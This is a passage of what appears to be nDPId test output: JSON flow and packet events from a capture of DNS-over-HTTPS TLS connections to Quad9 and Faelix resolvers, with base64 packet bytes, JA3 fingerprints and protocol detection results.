+00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":946739311048,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":180,"pkt_l4_len":146,"thread_ts_msec":946739311048,"pkt":"REREREREZmZmZmZmCABFAACmYCJAAL0GXEYKAAABuSuHAZUqAburhClHMeSxCFAYAfUBggAAFgMDAEYQAABCQQS+L1tdhkv27psDloITDJmmm+nkuKGJ6kBYeGBEdwUOSK4polbbfA55gXHwNtK3Y1Aq1CUhl++X\/zqhOD+IGqi8FAMDAAEBFgMDACgAAAAAAAAAALayQyzNIxhtoOFefQYzbs\/rDW3NZGb\/HW2xO7qHfaVY"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311335,"flow_last_seen":946739311335,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311335,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":946739311335,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739311335,"pkt":"REREREREZmZmZmZmCABFAAFF8W5AAL0G+HQKAAABCQkJCso6Abuxr7nkL4f0JVAYAfbUBgAAFgMBARgBAAEUAwN330DAziY7Qy75ow2vvPPweI0WjrfNmIygzjgDJAOaiiBkC+TeFnwD\/kQWoA8NwSkWiR\/ZS3JD6l8yhQXJVgAa3gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG5zMTAucXVhZDkubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AICW+8u6SZcrHjrKSceEpWhhd\/sXKRaui0Qq2OMNRWOwf"} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311335,"flow_last_seen":946739311335,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311335,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":946739311357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739311357,"pkt":"ZmZmZmZmRERERERECABFAAXUEqtAADsGVKoJCQkKCgAAAQG7yjovh\/Qlsa+7AVAQAHdneAAAFgMDAHoCAAB2AwPsHFeUVovCXmWpA4VyNoqF1JeqKqRwRROYqOPJU94DoSBkC+TeFnwD\/kQWoA8NwSkWiR\/ZS3JD6l8yhQXJVgAa3hMCAAAuACsAAgMEADMAJAAdACBGm95D7Gx83XoeinRk1rxGpZA8u1buvy6HtAvs0UM2ZxQDAwABARcDAwAgBCGr5NOssVZ7TUX4BrL7MyB6aRLwiu1feUb2m7o8fLYXAwMKaD942IoOSpCliO6ZHVfN+ruurWUvz7jYgeJjK7SV5aPdpOPU+gCK34wDZjZp50dMaIsg77NAx4MrmJU6wTsTAwZldztvUMpws2wEYMHKWN686r\/ZugmuzBYB3tOPhjCMvk8pBO5Z4lVJQc9Hb1RsJ03QnqO\/EjZsCDIJr3EwAdBfauIjY3hi6AzlRf9VL9JoUREwghpYtzQDH4RvKScS6ISuIZ0qtqLTaSpG1rQC+HJZ6KKhTxZKSTcym6aIqvAR7ZiyINnXnDnxtWbl8cRiOiDv8PdDsr+5E5xwhcf6QYoUCBscXYYl1EwqfCWZLU9EdSEHvyBTgkaNAt3XMqrEl7x4wjZ94SWxkiQsQ3IyHj5ooHHdJLNgfAhAZ1sF3MqWOMepm6yBmJwKpSpxHS0\/\/oYNPpH+52R4vidTCtKs7UfIN9SKrOu0JFbGVqc8M5lplCXOQx4+S48+BecP0sGtTkcShvyBVSAANiwxQTDnS7JinVgGYtRwWjEqrWQJJopko6YuGLn+wkhYZkogv\/onHZtE4hlsg01xAHJ9PxQYxWbOdVfS1w0JvhE5EDMILwTMYm\/YfzaRcfZnN3X3c8PldLUC8Q00rxaePA+7a5mbMlVzZ\/ZKqlpmGHRhU3G\/b+Za7F3XZpTKcWJ\/+pP4OAaUaey+j0NOSrl7D3\/HeWq7P0vSd\/KYIm9oS0ZJvLtsffCfxTm2zwDcPGhRfKW16iadTUvmoczzCHSYvw+n8hl61iMBIgJerq\/CN9KkicrNEfU8QCR9bMF1D3CABgNImMdCKODlAcrpb\/Ya\/cQUwfP\/CWuVsZ3s+sh12SEW9JLfAgHTnuYwcMjbvAf2Fgpb\/+WmXCT93+A3gLKANXIVA2PfvntvndGO4gXYEiHaUhu4qZSsHkkcQJ5rwvJrE4CSJC\/fp+te7FlAxBXZxU3peCLLIMzIhccFKuqNX9+cPYxqAzm+f4FDsJg5KvH5AIh6Nda\/JBKZzhlz2omWzUxsNRCyzYkCR\/6xx8emByUElOOQjp3\/HRm+WaL5aZHnOk2myD86PdWR0IdZibdlJEHJ2\/GXJsQQv95dhA35hvgjWHiQLe0QLkAtPzosLXULXc5d7ytqMATetgFrOl+B+IuaEJAtm5NdT9m+\/Uo1nl\/TbvSaNp5EaxK2DPhV7Vt+vxmsBj23m0aDhv8PPgUfy9wK\/Niqob3bOD6oQrofsTggzpDg\/0PeQx+LRnGU46v4ljhYI4JoQY+cJBFQKWNeFww9uy1s8SJhz9LzcLFv+j30Vt+r4FFm8AZfzHX3wSuBELuShY7dZHSjQzxqOJfeGLr5ThoXw5ldv54ifSY52Lfxp8BkElu7BDDbf4F6XdVR3aRKy8Yk7ooQevFc0GOsxn7jXeMuFiaf9M\/MspabzWIKD5sTaMPvexVqQrSIhAE01MVqTa8zAs1n4D9AszPAZaArvvaw1dpUAGCn22YGrLkylRxMCN07\/HyOXir6cpxUbsvRgSag8LgIuYbY\/Ta1KZ2trDeXprvYofOqOqX\/ep4LHzQHiCFm14LvDzSoMa4qqUdxfJfOjiZQVsJdT+2uThs188toZRMoZsziXxP++fZpO4m\/wGTJ13ciJYHkQjnaWtFJW9KHR4pPyXX3T1W5XcomUZpNi+tnQlSKiXPl02KPyhw0qdY8Z0WoKV536f3wtH00HuTa3UIk1hZxDmxFcYOKvSwc"} +00942{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":114,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311335,"flow_last_seen":946739311357,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1737,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739311357,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"9.9.9.10","src_port":51770,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns10.quad9.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":946739311358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1616,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1616,"pkt_l4_len":1582,"thread_ts_msec":946739311358,"pkt":"ZmZmZmZmRERERERECABFAAZCEqxAADsGVDsJCQkKCgAAAQG7yjovh\/nRsa+7AVAYAHfZAwAA1xiWPE9sRZ+HRED66TQP2BK\/H\/\/55yXpchOqptSfdmizDwWdekTWC4fynK8Z2sZPt7VLeiJJja8C3BQX9Rz0xZnn1eoThbbJA0Ru7pA+5J7tyanMo4IQcPUIBSO5p49Bymfzm29G5qjErMG7mQ0OPPjTCRaB\/UjgjbKvSEcd8\/qlBT71ZfI4uv2myCBr7kstCCXPIR18CKF+Z2\/VrH6vxRdx\/DMaAsMgc41PzNU7xNOukRDZxOR62YLQKe5TOm9eGAE6qQfGiWVQuBPTBNCMLbyMtxxnLWSXpHUM8lAFCuaK7Kc6QBacccBEf2G6WUxZTWFo3b0bLTLXGsaAdMgEEvX57cRGL6Gq8YWmgloFc0L4YPSBPg4QXqG2603cgV+j6PlTHv6e2HefSTdXdeLXiPRCN345+9Y7w0ERX6leOOccKhVG5SuGrnMow7zmCn7a2KZDo6IK6nPbbrDUtvAROe\/2qAE2VCX9KID9EijWEziQ9XCbVPjeL02DA\/rYN7wYXRiJgCIeBs3cXR7OygqBY2+3+XFzo9TaLSJOjL2D0foR73wSCVhYWptmpzwaIHjhZCo4rI5hdLdI5wijBOAwhmr7WRW8Yv8AQsnvt1Z4coLNvTRubKzb6tX\/Oxf2jOtE8ql46ReYSM8F\/WAKChrNRMIbb1FxJ7q10gZXMDttRcPXX\/qGmHUzaGCJmbtVGS68jgVwThCO60XMMu84lvsX\/Ppf9SgVkWGycwU0+7rBExjec94Gk2PRYtyBh7FtK\/ojKF2Zx1IbH4Ped7sLfGR4i7sMPLWNn+T5wJpId2IpurmzQEup+Wmo7GS+GCV0scp4nxOFT1awumcjwSZT8bYpF93Gq1VRsPaw1Ed8OHX5e5gmoY4MVzie+NT9SEgMn6ichQsu5snHAMbc8\/IWQxw1j4WN38V6zcIh4u4V1Gd7SkhAHeYNQaHO8zyvvE8ImQNU3iYNHLIKvw9jrqWUBqp23GQnf3jir7+jnbT6O6iTPLexjWoZTCF\/FtolEJ0e895tZWyhQDvFKtQE5PBsOvi7\/BalOF7pvRKDn\/re0ni0oWgQPdEaU+LIaPzCC8LkWYd5oE27150iJxzh1Gp8SiKQXDLhLhi579hHj1+ols2JqJH8RdJfR0+VmnJeuW7LLf+BRMSJBXoQCCLgwxC7f\/h7fFu2xKC0W6c42fJZaQRckgm7zcULCvbrdB3\/7TiSzFX4IqscHoIIazQksB3SnhTuJmLtEq0s5iQGUGxfhlMGhmMgzukQ6S3xziGVGLlkCIIbeLTBQrX9TXDN8S1GsZEFqBjMPt\/N1zN3ViQ2J2at2dPSgSFskYDCKI7W279fwmbZs7V8tsMKdl7zI9bVkSm8TK+VOCU7uRHndZTCFD0rVG1nulq\/L99PnlHGAGXK\/CqGETUVVLlDxaOxEAgpjONuItzxylFN2ddXgvj3hTCiDE8O0ZeY5HxF3kaLieLFjiKlcFdLwH+yoWIasdZ5ETRJVqr26OzVYBTCPTfSgbwHD0EdFC3v31MUjg04ocQ4ZiFf7dRFVtWmOWN0r2SpHXy2xEBvMuqeP3vQyXuuz6g6Dn7YZmJY0+sx4Fy9C8oBJAE0ZwKxguZmJv1GeQHP6tU\/veMnBxdJr3tx5OgYDk+909nj4a5TD3cRR1pqKY8PwvBnQ1a7o21Mx6az\/nj775\/EQh2soovj6zthqPP\/vtXFBBG3tG\/sEPeFuYX44cpRhz5K3N4JqP6Lp6W3KZYJ1EwmXdPWiQcbK\/K0dzC4LCmApJnMsipnxLFAxIsyZnv1pRKdZtp6E4ZNkwItTRiePKudtegvLH1+qbg3pXvAj\/AueIMUCY+nZ2bEiLI67RcDAwBgsXSJyFgjJRWpsUIwFa+B3HudQHKrExr60U8JLlKkL\/P\/S+PEy7whFdA90+7WJF1F8DCmOjyvxxrrWdZx35m5pHvRkiSavCeWDYlRzcWBeiUF0TAz0e0CdFpMI0nfm+C5FwMDAEXIcqRX1+3I4YBN1ZyTwBh\/\/IzIU5lJHrJKAnGrUu2ocpCQI2eEwS+zVK0zKk1o2WUWMhhsV2wCrUmzne3qZHF1rWYeRVk="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311566,"flow_last_seen":946739311566,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311566,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":946739311566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739311566,"pkt":"REREREREZmZmZmZmCABFAAFFTLFAAL0GMYcKAAABuYbEN9gaAbsU0wRrjALq7FAYAfY\/sgAAFgMBARgBAAEUAwN53D+IdbyKMqUcdChlG3BH1byG6PSts1pdzll38jdueyClHPY2D7aJB29xaaA7zmDQUztgP6bTAGw+VMEA\/cNmhwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPcmRucy5mYWVsaXgubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIASid2tq+mdmASZBUTGU5iyt2F1JUvrNCp22BxrDleoO"} +00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311566,"flow_last_seen":946739311566,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739311566,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04388{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":946739311603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739311603,"pkt":"ZmZmZmZmRERERERECABFAAuAg39AADQGeX65hsQ3CgAAAQG72BqMAursFNMFiFAQAfVJ7QAAFgMDAHoCAAB2AwNkY5ffptLk\/1RQxoHPHysW3r9+0ddQo4Z3YjqxuStqKyClHPY2D7aJB29xaaA7zmDQUztgP6bTAGw+VMEA\/cNmhxMCAAAuACsAAgMEADMAJAAdACDs3oZu6oN3lGaq4ly6\/hAqFwB\/djty35eYhaI2Lxe7SRQDAwABARcDAwAgv82VBnjlaTkDEuDhSukFo4HH4nI6fax\/zFPW2XozJ0kXAwMOr9L3WKPFCRevhqaVGoGS+x\/kXxxMckfNoOqk04UOi2nffzkls4dz\/6PwTgD2O+tiYezNJxr\/6WpHVX82B1TCh5LVuQtfmobZqrhUuztxfuDnZpjdtqBFN8\/ThU4OUKCLhdBohaEJUJaODtpSPbvHLMo+XUoovzoT0\/zM8eQTXQpCXzBBMJx7xHTAsbkvGn3C+AG5zWAlrqlt8rw8cJvpcKk420r2AjCbqQCcOhIk9fgtrE6sGQpDmvb1eDYkMJL0ZWhtJpArnw4DJbVlN2eqshODC2oEeU4LRs6HxumiPK1q9BAYm9j4B\/VQvljlxD1l2D54nI0XTtCqzYVH05VeNSyKwY99P0gfk5KbNuwMkg76KjoZ0pANDmDoK2O7MRcalHkbOzBtmCZzhD7k0YW7eqNkMU5wTjhw6\/SKqF25gZNB9Nt6RXkKo6zhp67SL4jpzGRuSRzfeNfXwE70s6GkDEHT87ePp0CPZwkccES0koYuFCUJ8ZPaF51CsuO3hEK6HLj90BijpqZSqxhfc1mm\/yqD3lLZlsT6EnUdCBK75PQ4LqFtNj1aZVWZmY0bISdBsjTgcU\/azUhlVpbtuwFzbRgeZMjYItDFV3G2Mz1lBTIG8+EI15TAfiX3THktTEDNdXWRIKZWc6CdSZSTQj5epKSMIDeZ3ym23Y5D0uYv2rRWwF77WpaBXG+MUxbpeWleGLZxmojsUrhsTN3K\/SO4YTnIH3mEDcbuEL\/C6kXZUUc3JKUkSmGmNO61dgMehbma4fB8llee+ia3ZxrMWwvGiTS2tpm78Rjdk2lVGQ4Kw0Hv16lr+xG8BLc4CMV63wU9gsM8SvlR14rXUIcZ1w1IVKRMCPj5\/ktzqCSdsd7JLAu6iqnF+tffAp0R7hABno4kl79WtkvKmhCxs2C9rHaxhWuglRBec9Q1dOU4n\/q5s3oTaT0MWOiB9FA9hPVkcr5rHO5WTaUTZCO3f07agWWupUC0SrT4kMq2F7GC\/qyJUokz54psYmDyksoYU5W4XunHAPWif32UI8qTU8ZnD9BGfH74hn454rDYVO6L7CccMxZlmp851erV6hvxeQE4QFic5+4T+9IQsqcHez2OFejw6vdevdAwPVqE+KjL4UP+MGf4lbUn4WzekrRNg4+OLWhqMW5jPxgVFLL1X\/7LXlyiUW3FZsQlx3wHUnrfnXgRsgIdVSezz4HY0222o0JjMjRIsMAML27omWMbFkL1GH9F5whlSmkQo7tR4pkO8ZObYU6gN63eRur2pr9yUb6mdaHxKmoMOtTc07t4c0mmYRPcKvUuGEq\/qFZAib\/Cn9qtJSED+KsOJFP3lcOvHyBWmDkPTuXhIirjxvNRHlhpCinnvq51BRLv0iIYtLa4+FWzOnZxdtRmb+J7gXcYqMUZr8f9hSbjcXpRs0qTCNkn\/vEFebnj0Oa5wWQ\/wyYqcIXbH0+Qg2t4MHCtt5puUCcnWiddPmXVCEbusxDhj1mW7Wb7s7TbeMJNHqJK2wkpexuwL1VqKOcMpKkVK63qTpeBRS7pKr42\/e4RAue3aCNMwXb2qN+nhV\/yAs+no2\/T8CA38S+A3XjJrTp3nRj3b7uYGTvq6vgcySIveyFsNVxbpOrMNJwA55r7OmJm\/TMMYu1Cmm7ApgsYESAyvVbBcTmlsCXf4kc5\/PCSNGVGXc3ry7HZ6UrNLiBxVinlqk+M5YS+nDMxRpBRZ\/l5jocQH\/hTpYeDeBYM6nlOI3a42ojQOf0qu\/s3tJK0pVMQq+L3fiObQL0w0ki8zB\/Pq94eJzcgGDCpDBI5rSkrXqKSKwE\/TPxGGb4EW3iPF5GMaLLk69BANjmbdOWrRbmSOZIerFLKML4S4ISArr9z\/Hd6jn9grfPQF5QPRgsy72snzNYK+cdD78EVK3JLSsYYqn88MbAXaWnvt\/NrtPJL0QXd+HGti75Czr60Z2exrtdLfvuyhP6EA\/OJF74UO1DMZkdkO4dBy70z4Gu4gpkQ7cqPDY0GZ19ZQkhDdIe6tY\/KPM4UldVfU5Ox+v3aicLwXXKsL1aYiIDMExLQqDr8Vp6Rg8MhQd15RVUWWezyYpN93w5RckR2WthYnNZNsPa7iVvEbmCiUoUkbzt39o4APEG2T8nb60w4QPGzL8Bs+6zqpdT6PPZQOoSFcrit36uSRZP8iGT1fW72Vs+Zxy5GcZuta5oSW5oky8Ru7NnhXKgfldlxRBIOjtCyzFizIawHPWtdb1FNijZyZVKdj4BP0ocR0b5RYPeWT1DhR9qwqhFmLRHqWhBkA5vK7BpYSEPmeNp9JvF8mc9PzqPXFx4qv46sa0RB9Om1TkSniqOmaKfC0VJ55FKEd3mCSVa1mQ2nzlNyLUC\/G6NFqNfA87dMc8kmjkPDW9L4TPuUdk6cFk2SWFMlOT4UEAqyKhiuK9S2TSwt8uFOPCTdi2gCXoEJdX+9z6vM3zP1D618aG60X5Ut6n4\/mqqX3ZYS740az2d1czqYB7kjzMa99L4RSKw9Nv7MMuwMNSxkhAXISg5MWpacHw\/KAdEQ1nUyITpRoICmtn4wFkGI6VHWSC4OZg5gMWs1Z3587N6CIw3eN5rLnfYJ5l6ZBNqLnr+ciVip8x2IDHWDGTGr5OC+uJxAOEMiK+fcS0il3LgKzbRTF6C8+Y0IWjT3NlBZzIZBcCE3FjrijIv+69vNs6VJAKOlSW3f43x0FPmVvFyGHd0hZ6go7pV\/2O1uABkUwtp9Jfvr8prX7E0NzIH8AuTCtktrwjOAvCJu4CHVfpkaygbTIxPH5m45oyD64MuKPbsc5SlgZwhfZunmTwVDMaVpXGfayrmusZgZ\/07zHxvKOvoAfTCZXoYameOeAqJlNLuCW2W26TogT5fb\/9WF1j5kVLVJW3+Xr3WsDu87Z6wA7xpdVjSQWvWXCJ9y6jEXbNwmvXmeHALYBp+DdvlGU6uIsmqv2tJETpbTRkgR+f7Dhm8aD8084eT\/a67jbRGqTJcyCWp8HFxcSFdtdPKZoErFiYrC7xPgwqW36MeKC3pPi5nT9yuHbuL7yiKV4x9J1dDJBmuStOS8bPFHHOamsDufj+1xHeCKIDfJN+meXy0zdvw70PEKqqZXmCwfi2TfqRVP7d77vAzcphP1F9+RnUlovNNUieiBKgaaaLwfIEAiD84YhuItQrVIeJCa0jqOgMbgEKi1twm5DKS0bcizlDtDFNkFvRAghS6l8H5MMzc8ps2oVnq34RHWoVdxAXCkHDkkmpkGwGKoEP+YEVOArEfXlh0taA60GiWgLXrspKhJVAnjFiuxV1QiMjD4R5UbJ+BnJTGXsaH\/yPppjwU5bzpYvq1TPW2pdHuooLQ3rQ5gXMFPVeJEv4l3u9D\/o1MxYmTHF6ag0Pg7EYa9IiJh8NJsAWlNoM+jz3\/neEdRD31BwTKccVefTs8giAaZY3hKJ1XXe6Hys7XZMAJR72EIr5DA0qa2euR8ERpA8eew\/h0vqG8NScpvxxA8Cdjmhn\/JwaSSF9ubglNVw4f\/Z3JUgBYq3\/\/+9aFTg5SP56AY5voL2goU8TTHIbBp4JfOUmUTToGPy4GEqVcJNDAs6V2L7PobZ6srGT2l40lZacD46Db+MrlADUrWNBC6GAGEaOIzjsVXO2C7zOXrZPBi"} +00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":140,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739311566,"flow_last_seen":946739311603,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3189,"flow_avg_l4_payload_len":1594,"midstream":1,"thread_ts_msec":946739311603,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02347{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":946739311604,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1444,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1444,"pkt_l4_len":1410,"thread_ts_msec":946739311604,"pkt":"ZmZmZmZmRERERERECABFAAWWg4FAADQGf2a5hsQ3CgAAAQG72BqMAvZEFNMFiFAYAfXAzwAArcpCfmGLOKjDkyzsTe+IPkiqYnruzR41MPuGsz88MQqvC3a9HfwXJ6lzqQ4rCWJcWhWOM\/faQczL\/u4LUA47B+3hgIraXqwM7U0QtAPKeofLhsqBn12DazruSHbiIbxy+mEUG3S56+4ZRbB44U5cKRW56AecOVegPdxq19WX7WP4+ZvrOsXSvkcqGqyY6l57+wMNGtK9Hor0ODYeWdBnCWx+J55Yp1BLeNHq9nHIKHj0qCJNcTpuSY3kcxYIKgCzUqmtnXdoJ0GIMlbY2ljKsarNr5cWoMUbBujc0flI7F15VAzRku1eV3Kl\/7Wukzg8w4HiH6xnnC2hyeJ\/S9kg8k3Thktb0MRLph1xkAte3QZc08opc3Fwo1Ft6aRVOUnBzMc2ygQi4cXDCHwkiaI53r8gMzkS7anbEcS4yQcROtN4r2sH3n\/Y2Qw1v5Gb+U\/+RFg8+P9ZzSoFBkttBuC7bMKkuFovtwfD7bmTraXz2TwXRpY3Ao54+\/SNvuV3GwVsY67MLueBEgpQWATGxrbkACZtD4C+lpPBC5\/54MNyZi6y2\/bINiwBN2SHIdC0sG5gR\/DV19ykdqXF3pfYHlmfR3703pqTCdiZz1zhoMZLCPXVwnRt08WzrSf9AJPIVrVED87vfcSxcnSNe9\/uUQ+fPjNxmvMBL8ur1shycxG8A4cFPyuqBeBuBrfVjZFKQN3\/5iT\/qY3bW5kYmBDrHkL2xegzf\/Moa8towjQGmRBeDyc9Fogbi4Bl2lSDI\/x3VZI\/8yRCU0YCrn33V5Yytpt4Nri5jL3CrvqNUKuK49C6RMwZ1n1NkjUcpjeYGCGRXo6SbIn8CHVjiCEwFZ8FbQctAnWvdqfTpT0bXGelftgC9CQThu\/W+ybRqQdwN+K5c2QiXPYvO4kT3LD6oCwacJ4x3t9XRv3AXxYa1UbtXwad0Q5XC17E9XVpbbgKhrlco595yY5V6j1HdG8AkTRI1DXbEp3foy5yEjtW0o9bfHyhwUqC6TBXcyz4z4cHmh5p6A6BMpnvPJtMyGOVMKQ7LtCwwAKXNWcMVkLjSAZ+IrhMtGXoEFJcdmyQxTOI+OfCfdgm6q9yTer0lySMXu3yBMcL6Vn1SuMzS2FSE1aXKAyCBb3XF5Tfnf2rLe4r3hkWTr8Mmu\/+5cpIK1r4NWR0zq6iT\/lnsbxmS39yt3YHMSpG1r36HYatyCzF6kZo6KyW2UJ6fBqDVBmGD6CXSVAKejLC8pL1qmuOu2eXU804WhkOIkczZMz7pQW6C0A+bVJsEuL5Kd7KV\/W2IGcqNMtuMkFf1vHE4VTHRAmWpIDFt5I4ja4qA9N7tAzSWPkgtQseSnNvTrX+nCc0rsjLviAcYafijP+ATzRDOBcDAwEZYz205aORxNiMwaiQeObwk59GyoJ+T+YW4iSATpt8cc0OU+XkwulympL8b+KCt76fJXCt3rgEOglVp2lJQDaaCL0\/EDry33zbH0MtKm5P5nEWpzvQFhaXV1WeS3oS65S\/3UVJT7\/Hm\/AkB6N0iCgWEeK4i80RHGCYRIweyu9kQIUklvy2RlmccKeVQTq37O+\/HqRcQLsrpTkATqOJMvj0MaZ7zkYReeTUbtUUtzasEHVGtHimiktW2DAjF2G7BrMbQnAbkBNJMIcDNYwAwDUJvD2+j752nnR\/ojUHAoRsnlpRRGw8k7CJ0b0wBSknElPWssxoC\/r5K7w37x9u118AdMWjqtzSlF2uDe2PtsgCUxjOE7EkCZxpOWsXAwMARUyGMct3ItX2QiSoGAs2qAHwCi